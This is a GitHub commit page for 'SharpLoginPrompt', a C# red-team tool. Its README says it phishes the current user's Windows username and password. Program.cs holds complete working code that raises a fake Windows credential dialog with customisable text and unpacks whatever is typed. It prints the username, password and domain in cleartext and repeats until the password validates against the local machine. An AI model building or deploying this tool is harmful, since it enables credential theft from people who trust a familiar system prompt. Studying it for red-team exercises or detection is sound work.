Skip to content

Commit

Permalink
first commit
Browse files Browse the repository at this point in the history
  • Loading branch information
Khandelwal committed Oct 20, 2019
0 parents commit 18b1dfa
Show file tree
Hide file tree
Showing 7 changed files with 244 additions and 0 deletions.
Binary file added .vs/SharpLoginPrompt/v15/.suo
Binary file not shown.
8 changes: 8 additions & 0 deletions README.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,8 @@
# SharpLoginPrompt

This Program creates a login prompt to gather username and password of the current user. This project allows red team to phish username and password of the current user without touching lsass and having adminitrator credentials on the system.

#Usage
run <SharpLoginPrompt.exe> to launch it with default settings

run <SharpLoginPrompt.exe "This is heading" "This is subheading"> to customize the login prompt
25 changes: 25 additions & 0 deletions SharpLoginPrompt.sln
Original file line number Diff line number Diff line change
@@ -0,0 +1,25 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 15
VisualStudioVersion = 15.0.28307.271
MinimumVisualStudioVersion = 10.0.40219.1
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SharpLoginPrompt", "SharpLoginPrompt\SharpLoginPrompt.csproj", "{C12E69CD-78A0-4960-AF7E-88CBD794AF97}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{C12E69CD-78A0-4960-AF7E-88CBD794AF97}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{C12E69CD-78A0-4960-AF7E-88CBD794AF97}.Debug|Any CPU.Build.0 = Debug|Any CPU
{C12E69CD-78A0-4960-AF7E-88CBD794AF97}.Release|Any CPU.ActiveCfg = Release|Any CPU
{C12E69CD-78A0-4960-AF7E-88CBD794AF97}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {4FD946E1-0FF2-405D-B247-CA1B920231C5}
EndGlobalSection
EndGlobal
124 changes: 124 additions & 0 deletions SharpLoginPrompt/Program.cs
Original file line number Diff line number Diff line change
@@ -0,0 +1,124 @@
using System;
using System.Net;
using System.DirectoryServices.AccountManagement;
using System.Runtime.InteropServices;
using System.Text;

namespace SharpLoginPrompt
{
class Program
{

[DllImport("ole32.dll")]
public static extern void CoTaskMemFree(IntPtr ptr);
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Auto)]
private struct CREDUI_INFO
{
public int cbSize;
public IntPtr hwndParent;
public string pszMessageText;
public string pszCaptionText;
public IntPtr hbmBanner;
}
[DllImport("credui.dll", CharSet = CharSet.Auto)]
private static extern int CredUIPromptForWindowsCredentials(ref CREDUI_INFO notUsedHere,
int authError,
ref uint authPackage,
IntPtr InAuthBuffer,
uint InAuthBufferSize,
out IntPtr refOutAuthBuffer,
out uint refOutAuthBufferSize,
ref bool fSave,
int flags);
[DllImport("credui.dll", CharSet = CharSet.Auto)]
private static extern bool CredUnPackAuthenticationBuffer(int dwFlags,
IntPtr pAuthBuffer,
uint cbAuthBuffer,
StringBuilder pszUserName,
ref int pcchMaxUserName,
StringBuilder pszDomainName,
ref int pcchMaxDomainame,
StringBuilder pszPassword,
ref int pcchMaxPassword);



static void Main(string[] args)
{
bool passwordOk = false;
while (passwordOk != true)
{

CREDUI_INFO credui = new CREDUI_INFO();
credui.pszCaptionText = args.Length ==2 ? args[0]:"Please enter the credentials";
credui.pszMessageText = args.Length == 2 ? args[1] : "Domain: " + (Environment.GetEnvironmentVariable("USERDOMAIN").ToString() ?? Environment.GetEnvironmentVariable("HOSTNAME").ToString());
credui.cbSize = Marshal.SizeOf(credui);
IntPtr outCredBuffer = new IntPtr();
uint outCredSize;
bool save = false;
uint authPackage = 0;

int result = CredUIPromptForWindowsCredentials(ref credui,
0,
ref authPackage,
IntPtr.Zero,
0,
out outCredBuffer,
out outCredSize,
ref save,
0x1

/* Generic */);
var usernameBuf = new StringBuilder(100);
var passwordBuf = new StringBuilder(100);
var domainBuf = new StringBuilder(100);

int maxUserName = 100;
int maxDomain = 100;
int maxPassword = 100;
if (result == 0)
{
if (CredUnPackAuthenticationBuffer(0, outCredBuffer, outCredSize, usernameBuf, ref maxUserName,
domainBuf, ref maxDomain, passwordBuf, ref maxPassword))
{
CoTaskMemFree(outCredBuffer);
NetworkCredential networkCredential = new NetworkCredential()
{
UserName = usernameBuf.ToString(),
Password = passwordBuf.ToString(),
Domain = domainBuf.ToString()


};
Console.WriteLine("Username = " + networkCredential.UserName);
Console.WriteLine("Password = " + networkCredential.Password);
Console.WriteLine("Doamain = " + networkCredential.Domain);
string userName;
if (networkCredential.UserName.ToString().Contains("\\"))
{
userName = networkCredential.UserName.ToString();
}
else
{
userName = (Environment.GetEnvironmentVariable("USERDOMAIN").ToString() ?? Environment.GetEnvironmentVariable("HOSTNAME").ToString()) + "\\" + networkCredential.UserName.ToString();
}
Console.WriteLine(userName);
try
{
PrincipalContext pcon = new PrincipalContext(ContextType.Machine, Environment.MachineName);
passwordOk = pcon.ValidateCredentials(userName, networkCredential.Password);
Console.WriteLine(passwordOk);
}
catch (System.DirectoryServices.AccountManagement.PrincipalOperationException)
{
passwordOk = false;
Console.WriteLine("Trying Again");
}


}
}
}
}
}
}
36 changes: 36 additions & 0 deletions SharpLoginPrompt/Properties/AssemblyInfo.cs
Original file line number Diff line number Diff line change
@@ -0,0 +1,36 @@
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;

// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("SharpLoginPrompt")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("SharpLoginPrompt")]
[assembly: AssemblyCopyright("Copyright © 2019")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]

// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]

// The following GUID is for the ID of the typelib if this project is exposed to COM
[assembly: Guid("c12e69cd-78a0-4960-af7e-88cbd794af97")]

// Version information for an assembly consists of the following four values:
//
// Major Version
// Minor Version
// Build Number
// Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]
1 change: 1 addition & 0 deletions SharpLoginPrompt/README.md
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
"# SharpLoginPrompt"
50 changes: 50 additions & 0 deletions SharpLoginPrompt/SharpLoginPrompt.csproj
Original file line number Diff line number Diff line change
@@ -0,0 +1,50 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{C12E69CD-78A0-4960-AF7E-88CBD794AF97}</ProjectGuid>
<OutputType>Exe</OutputType>
<RootNamespace>SharpLoginPrompt</RootNamespace>
<AssemblyName>SharpLoginPrompt</AssemblyName>
<TargetFrameworkVersion>v4.0</TargetFrameworkVersion>
<FileAlignment>512</FileAlignment>
<Deterministic>true</Deterministic>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Core" />
<Reference Include="System.DirectoryServices" />
<Reference Include="System.DirectoryServices.AccountManagement" />
<Reference Include="System.Xml.Linq" />
<Reference Include="System.Data.DataSetExtensions" />
<Reference Include="Microsoft.CSharp" />
<Reference Include="System.Data" />
<Reference Include="System.Xml" />
</ItemGroup>
<ItemGroup>
<Compile Include="Program.cs" />
<Compile Include="Properties\AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
</Project>

0 comments on commit 18b1dfa

Please sign in to comment.